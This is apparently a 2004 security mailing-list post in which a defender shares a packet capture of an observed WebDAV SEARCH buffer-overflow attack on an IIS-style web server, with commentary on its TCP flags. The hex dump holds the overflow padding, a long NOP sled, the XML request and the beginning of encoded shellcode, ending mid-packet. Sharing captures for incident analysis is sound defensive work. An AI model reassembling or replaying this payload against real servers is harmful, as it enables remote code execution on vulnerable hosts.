|
|
RE: Excessively large URI attacks: msg#00043security.intrusions
Donald wrote Thursday, May 06, 2004 19:03 > Got more packets:-) > A 1/2 dozen or so all from the same attack would be helpful. Here's what should be a complete one-sided capture of what looks very similar to the stuff Bruce Platt posted. Whatever it is, it likes to hammer on the same address for hours on end. It does not send a short test SEARCH request like the majority of tools and worms I saw last year did - anything that ACKs on TCP 80 gets the exploit right away. It uses flags that confuse me a little - no flags besides ACK for most, a FIN between the overflow and the payload, and PSH only on the final packet. Source, target, and HTTP Host address changed. Shell code at the end. 20:39:29.944203 IP (tos 0x0, ttl 113, id 48428, len 48) 0.0.0.1.2333 > 10.0.0.1.80: S [tcp sum ok] 1909416685:1909416685(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) 0x0000 4500 0030 bd2c 4000 7106 b991 0000 0001 E..0.,@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf 62ed 0000 0000 .......Pq.b..... 0x0020 7002 faf0 16fb 0000 0204 05b4 0101 0402 p............... 20:39:30.003412 IP (tos 0x0, ttl 113, id 48458, len 40) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 1909416686:1909416686(0) ack 3471828372 win 64240 (DF) 0x0000 4500 0028 bd4a 4000 7106 b97b 0000 0001 E..(.J@.q..{B.<+ 0x0010 0a00 0001 091d 0050 71cf 62ee ceef e594 .......Pq.b..... 0x0020 5010 faf0 8f2a 0000 0000 1c54 9697 P....*.....T.. 20:39:30.179802 IP (tos 0x0, ttl 113, id 48515, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 0:1460(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bd83 4000 7106 b38e 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf 62ee ceef e594 .......Pq.b..... 0x0020 5010 faf0 b4c5 0000 5345 4152 4348 202f P.......SEARCH./ 0x0030 9002 b102 b102 b102 b102 b102 b102 b102 ................ 0x0040 b102 b102 b102 b102 b102 b102 b102 b102 ................ ... (all b102) 0x05d0 b102 b102 b102 b102 b102 b102 ............ 20:39:30.219277 IP (tos 0x0, ttl 113, id 48516, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 1460:2920(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bd84 4000 7106 b38d 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf 68a2 ceef e594 .......Pq.h..... 0x0020 5010 faf0 eaef 0000 b102 b102 b102 b102 P............... 0x0030 b102 b102 b102 b102 b102 b102 b102 b102 ................ ... (all b102) 0x02d0 b102 b102 b102 b102 b102 b102 b102 b102 ................ 0x02e0 b102 b190 9090 9090 9090 9090 9090 9090 ................ 0x02f0 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:30.333308 IP (tos 0x0, ttl 113, id 48546, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 2920:4380(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bda2 4000 7106 b36f 0000 0001 E.....@.q..oB.<+ 0x0010 0a00 0001 091d 0050 71cf 6e56 ceef e594 .......Pq.nV.... 0x0020 5010 faf0 41d2 0000 9090 9090 9090 9090 P...A........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:30.377706 IP (tos 0x0, ttl 113, id 48547, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 4380:5840(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bda3 4000 7106 b36e 0000 0001 E.....@.q..nB.<+ 0x0010 0a00 0001 091d 0050 71cf 740a ceef e594 .......Pq.t..... 0x0020 5010 faf0 3c1e 0000 9090 9090 9090 9090 P...<........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:30.427256 IP (tos 0x0, ttl 113, id 48548, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 5840:7300(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bda4 4000 7106 b36d 0000 0001 E.....@.q..mB.<+ 0x0010 0a00 0001 091d 0050 71cf 79be ceef e594 .......Pq.y..... 0x0020 5010 faf0 366a 0000 9090 9090 9090 9090 P...6j.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:30.655004 IP (tos 0x0, ttl 113, id 48586, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 7300:8760(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bdca 4000 7106 b347 0000 0001 E.....@.q..GB.<+ 0x0010 0a00 0001 091d 0050 71cf 7f72 ceef e594 .......Pq..r.... 0x0020 5010 faf0 30b6 0000 9090 9090 9090 9090 P...0........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:30.704430 IP (tos 0x0, ttl 113, id 48587, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 8760:10220(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bdcb 4000 7106 b346 0000 0001 E.....@.q..FB.<+ 0x0010 0a00 0001 091d 0050 71cf 8526 ceef e594 .......Pq..&.... 0x0020 5010 faf0 2b02 0000 9090 9090 9090 9090 P...+........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:30.749093 IP (tos 0x0, ttl 113, id 48588, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 10220:11680(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bdcc 4000 7106 b345 0000 0001 E.....@.q..EB.<+ 0x0010 0a00 0001 091d 0050 71cf 8ada ceef e594 .......Pq....... 0x0020 5010 faf0 254e 0000 9090 9090 9090 9090 P...%N.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:30.922257 IP (tos 0x0, ttl 113, id 48648, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 11680:13140(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be08 4000 7106 b309 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf 908e ceef e594 .......Pq....... 0x0020 5010 faf0 1f9a 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:30.966809 IP (tos 0x0, ttl 113, id 48649, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 13140:14600(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be09 4000 7106 b308 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf 9642 ceef e594 .......Pq..B.... 0x0020 5010 faf0 19e6 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.031191 IP (tos 0x0, ttl 113, id 48674, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 14600:16060(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be22 4000 7106 b2ef 0000 0001 E...."@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf 9bf6 ceef e594 .......Pq....... 0x0020 5010 faf0 1432 0000 9090 9090 9090 9090 P....2.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.179754 IP (tos 0x0, ttl 113, id 48723, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 18980:20440(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be53 4000 7106 b2be 0000 0001 E....S@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf ad12 ceef e594 .......Pq....... 0x0020 5010 faf0 0316 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.229187 IP (tos 0x0, ttl 113, id 48724, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 20440:21900(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be54 4000 7106 b2bd 0000 0001 E....T@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf b2c6 ceef e594 .......Pq....... 0x0020 5010 faf0 fd61 0000 9090 9090 9090 9090 P....a.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.303508 IP (tos 0x0, ttl 113, id 48739, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 21900:23360(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be63 4000 7106 b2ae 0000 0001 E....c@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf b87a ceef e594 .......Pq..z.... 0x0020 5010 faf0 f7ad 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.343020 IP (tos 0x0, ttl 113, id 48740, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 23360:24820(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be64 4000 7106 b2ad 0000 0001 E....d@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf be2e ceef e594 .......Pq....... 0x0020 5010 faf0 f1f9 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.392518 IP (tos 0x0, ttl 113, id 48741, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 24820:26280(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be65 4000 7106 b2ac 0000 0001 E....e@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf c3e2 ceef e594 .......Pq....... 0x0020 5010 faf0 ec45 0000 9090 9090 9090 9090 P....E.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.551042 IP (tos 0x0, ttl 113, id 48795, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 26280:27740(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be9b 4000 7106 b276 0000 0001 E.....@.q..vB.<+ 0x0010 0a00 0001 091d 0050 71cf c996 ceef e594 .......Pq....... 0x0020 5010 faf0 e691 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.605445 IP (tos 0x0, ttl 113, id 48798, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 29200:30660(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc be9e 4000 7106 b273 0000 0001 E.....@.q..sB.<+ 0x0010 0a00 0001 091d 0050 71cf d4fe ceef e594 .......Pq....... 0x0020 5010 faf0 db29 0000 9090 9090 9090 9090 P....).......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.669778 IP (tos 0x0, ttl 113, id 48811, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 16060:17520(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc beab 4000 7106 b266 0000 0001 E.....@.q..fB.<+ 0x0010 0a00 0001 091d 0050 71cf a1aa ceef e594 .......Pq....... 0x0020 5010 faf0 0e7e 0000 9090 9090 9090 9090 P....~.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.719253 IP (tos 0x0, ttl 113, id 48813, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 30660:32120(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bead 4000 7106 b264 0000 0001 E.....@.q..dB.<+ 0x0010 0a00 0001 091d 0050 71cf dab2 ceef e594 .......Pq....... 0x0020 5010 faf0 d575 0000 9090 9090 9090 9090 P....u.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.873316 IP (tos 0x0, ttl 113, id 48848, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 32120:33580(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bed0 4000 7106 b241 0000 0001 E.....@.q..AB.<+ 0x0010 0a00 0001 091d 0050 71cf e066 ceef e594 .......Pq..f.... 0x0020 5010 faf0 cfc1 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:31.971904 IP (tos 0x0, ttl 113, id 48866, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 33580:35040(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bee2 4000 7106 b22f 0000 0001 E.....@.q../B.<+ 0x0010 0a00 0001 091d 0050 71cf e61a ceef e594 .......Pq....... 0x0020 5010 faf0 ca0d 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:32.055876 IP (tos 0x0, ttl 113, id 48878, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 35040:36500(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc beee 4000 7106 b223 0000 0001 E.....@.q..#B.<+ 0x0010 0a00 0001 091d 0050 71cf ebce ceef e594 .......Pq....... 0x0020 5010 faf0 c459 0000 9090 9090 9090 9090 P....Y.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:32.199439 IP (tos 0x0, ttl 113, id 48962, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 17520:18980(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bf42 4000 7106 b1cf 0000 0001 E....B@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf a75e ceef e594 .......Pq..^.... 0x0020 5010 faf0 08ca 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:32.248936 IP (tos 0x0, ttl 113, id 48963, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 27740:29200(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bf43 4000 7106 b1ce 0000 0001 E....C@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf cf4a ceef e594 .......Pq..J.... 0x0020 5010 faf0 e0dd 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:32.407340 IP (tos 0x0, ttl 113, id 48974, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 37960:39420(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bf4e 4000 7106 b1c3 0000 0001 E....N@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf f736 ceef e594 .......Pq..6.... 0x0020 5010 faf0 b8f1 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:32.615242 IP (tos 0x0, ttl 113, id 49074, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 39420:40880(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bfb2 4000 7106 b15f 0000 0001 E.....@.q.._B.<+ 0x0010 0a00 0001 091d 0050 71cf fcea ceef e594 .......Pq....... 0x0020 5010 faf0 b33d 0000 9090 9090 9090 9090 P....=.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:32.932173 IP (tos 0x0, ttl 113, id 49112, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 40880:42340(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc bfd8 4000 7106 b139 0000 0001 E.....@.q..9B.<+ 0x0010 0a00 0001 091d 0050 71d0 029e ceef e594 .......Pq....... 0x0020 5010 faf0 ad89 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:33.293549 IP (tos 0x0, ttl 113, id 49194, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 36500:37960(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c02a 4000 7106 b0e7 0000 0001 E....*@.q...B.<+ 0x0010 0a00 0001 091d 0050 71cf f182 ceef e594 .......Pq....... 0x0020 5010 faf0 bea5 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:33.580546 IP (tos 0x0, ttl 113, id 49281, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 42340:43800(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c081 4000 7106 b090 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 0852 ceef e594 .......Pq..R.... 0x0020 5010 faf0 a7d5 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:33.629984 IP (tos 0x0, ttl 113, id 49282, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 43800:45260(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c082 4000 7106 b08f 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 0e06 ceef e594 .......Pq....... 0x0020 5010 faf0 a221 0000 9090 9090 9090 9090 P....!.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:33.892442 IP (tos 0x0, ttl 113, id 49340, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 45260:46720(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c0bc 4000 7106 b055 0000 0001 E.....@.q..UB.<+ 0x0010 0a00 0001 091d 0050 71d0 13ba ceef e594 .......Pq....... 0x0020 5010 faf0 9c6d 0000 9090 9090 9090 9090 P....m.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:33.961651 IP (tos 0x0, ttl 113, id 49352, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 46720:48180(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c0c8 4000 7106 b049 0000 0001 E.....@.q..IB.<+ 0x0010 0a00 0001 091d 0050 71d0 196e ceef e594 .......Pq..n.... 0x0020 5010 faf0 96b9 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.144832 IP (tos 0x0, ttl 113, id 49437, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 48180:49640(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c11d 4000 7106 aff4 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 1f22 ceef e594 .......Pq..".... 0x0020 5010 faf0 9105 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.199237 IP (tos 0x0, ttl 113, id 49438, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 49640:51100(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c11e 4000 7106 aff3 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 24d6 ceef e594 .......Pq.$..... 0x0020 5010 faf0 8b51 0000 9090 9090 9090 9090 P....Q.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.238863 IP (tos 0x0, ttl 113, id 49439, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 51100:52560(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c11f 4000 7106 aff2 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 2a8a ceef e594 .......Pq.*..... 0x0020 5010 faf0 859d 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.432526 IP (tos 0x0, ttl 113, id 49520, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 52560:54020(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c170 4000 7106 afa1 0000 0001 E....p@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 303e ceef e594 .......Pq.0>.... 0x0020 5010 faf0 7fe9 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.481399 IP (tos 0x0, ttl 113, id 49521, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 54020:55480(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c171 4000 7106 afa0 0000 0001 E....q@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 35f2 ceef e594 .......Pq.5..... 0x0020 5010 faf0 7a35 0000 9090 9090 9090 9090 P...z5.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.615104 IP (tos 0x0, ttl 113, id 49570, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 55480:56940(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c1a2 4000 7106 af6f 0000 0001 E.....@.q..oB.<+ 0x0010 0a00 0001 091d 0050 71d0 3ba6 ceef e594 .......Pq.;..... 0x0020 5010 faf0 7481 0000 9090 9090 9090 9090 P...t........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.748802 IP (tos 0x0, ttl 113, id 49609, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 56940:58400(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c1c9 4000 7106 af48 0000 0001 E.....@.q..HB.<+ 0x0010 0a00 0001 091d 0050 71d0 415a ceef e594 .......Pq.AZ.... 0x0020 5010 faf0 6ecd 0000 9090 9090 9090 9090 P...n........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.793445 IP (tos 0x0, ttl 113, id 49610, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 58400:59860(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c1ca 4000 7106 af47 0000 0001 E.....@.q..GB.<+ 0x0010 0a00 0001 091d 0050 71d0 470e ceef e594 .......Pq.G..... 0x0020 5010 faf0 6919 0000 9090 9090 9090 9090 P...i........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:34.847788 IP (tos 0x0, ttl 113, id 49611, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 59860:61320(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c1cb 4000 7106 af46 0000 0001 E.....@.q..FB.<+ 0x0010 0a00 0001 091d 0050 71d0 4cc2 ceef e594 .......Pq.L..... 0x0020 5010 faf0 6365 0000 9090 9090 9090 9090 P...ce.......... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:35.001220 IP (tos 0x0, ttl 113, id 49623, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 61320:62780(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c1d7 4000 7106 af3a 0000 0001 E.....@.q..:B.<+ 0x0010 0a00 0001 091d 0050 71d0 5276 ceef e594 .......Pq.Rv.... 0x0020 5010 faf0 5db1 0000 9090 9090 9090 9090 P...]........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:35.159656 IP (tos 0x0, ttl 113, id 49670, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 62780:64240(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c206 4000 7106 af0b 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 582a ceef e594 .......Pq.X*.... 0x0020 5010 faf0 57fd 0000 9090 9090 9090 9090 P...W........... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x05d0 9090 9090 9090 9090 9090 9090 ............ 20:39:35.159778 IP (tos 0x0, ttl 113, id 49741, len 40) 0.0.0.1.2333 > 10.0.0.1.80: F [tcp sum ok] 67124:67124(0) ack 1 win 64240 (DF) 0x0000 4500 0028 c24d 4000 7106 b478 0000 0001 E..(.M@.q..xB.<+ 0x0010 0a00 0001 091d 0050 71d0 6922 ceef e594 .......Pq.i".... 0x0020 5011 faf0 88f4 0000 0000 abba 35ba P...........5. 20:39:35.209117 IP (tos 0x0, ttl 113, id 49671, len 1500) 0.0.0.1.2333 > 10.0.0.1.80: . [tcp sum ok] 64240:65700(1460) ack 1 win 64240 (DF) 0x0000 4500 05dc c207 4000 7106 af0a 0000 0001 E.....@.q...B.<+ 0x0010 0a00 0001 091d 0050 71d0 5dde ceef e594 .......Pq.]..... 0x0020 5010 faf0 85a6 0000 9090 9090 9090 9090 P............... 0x0030 9090 9090 9090 9090 9090 9090 9090 9090 ................ ... (all 9090) 0x0520 9090 9090 9090 9090 9090 9090 9090 9090 ................ 0x0530 9090 9090 908b f932 c0fe c0f2 aeff e720 .......2........ 0x0540 4854 5450 2f31 2e31 0d0a 486f 7374 3a20 HTTP/1.1..Host:. 0x0550 3130 2e30 302e 3030 2e30 3031 0d0a 436f 10.00.00.001..Co 0x0560 6e74 656e 742d 5479 7065 3a20 7465 7874 ntent-Type:.text 0x0570 2f78 6d6c 0d0a 436f 6e74 656e 742d 4c65 /xml..Content-Le 0x0580 6e67 7468 3a20 3133 3939 0d0a 0d0a 3c3f ngth:.1399....<? 0x0590 786d 6c20 7665 7273 696f 6e3d 2231 2e30 xml.version="1.0 0x05a0 223f 3e0d 0a3c 673a 7365 6172 6368 7265 "?>..<g:searchre 0x05b0 7175 6573 7420 786d 6c6e 733a 673d 2244 quest.xmlns:g="D 0x05c0 4156 3a22 3e0d 0a3c 673a 7371 6c3e 0d0a AV:">..<g:sql>.. 0x05d0 5365 6c65 6374 2022 4441 563a Select."DAV: 20:39:35.268440 IP (tos 0x0, ttl 113, id 49680, len 1464) 0.0.0.1.2333 > 10.0.0.1.80: P [tcp sum ok] 65700:67124(1424) ack 1 win 64240 (DF) 0x0000 4500 05b8 c210 4000 7106 af25 0000 0001 E.....@.q..%B.<+ 0x0010 0a00 0001 091d 0050 71d0 6392 ceef e594 .......Pq.c..... 0x0020 5018 faf0 8fa4 0000 6469 7370 6c61 796e P.......displayn 0x0030 616d 6522 2066 726f 6d20 7363 6f70 6528 ame".from.scope( 0x0040 290d 0a3c 2f67 3a73 716c 3e0d 0a3c 2f67 )..</g:sql>..</g 0x0050 3a73 6561 7263 6872 6571 7565 7374 3e0d :searchrequest>. 0x0060 0a01 9090 9090 9090 9090 9090 9090 9090 ................ 0x0070 9090 9090 9090 9090 9090 9090 9090 9090 ................ 0x0080 9090 9090 9090 9090 9090 9090 9090 9090 ................ 0x0090 9090 9090 9090 9090 9090 9090 9090 9090 ................ 0x00a0 9090 9090 9090 9090 9090 9090 9090 9090 ................ 0x00b0 9090 9090 9090 9090 9090 9090 9090 9090 ................ 0x00c0 9090 9090 9090 9090 90eb 02eb 05e8 f9ff ................ 0x00d0 ffff 5b31 c966 b9d8 0480 730e a143 e2f9 ..[1.f....s..C.. 0x00e0 48e3 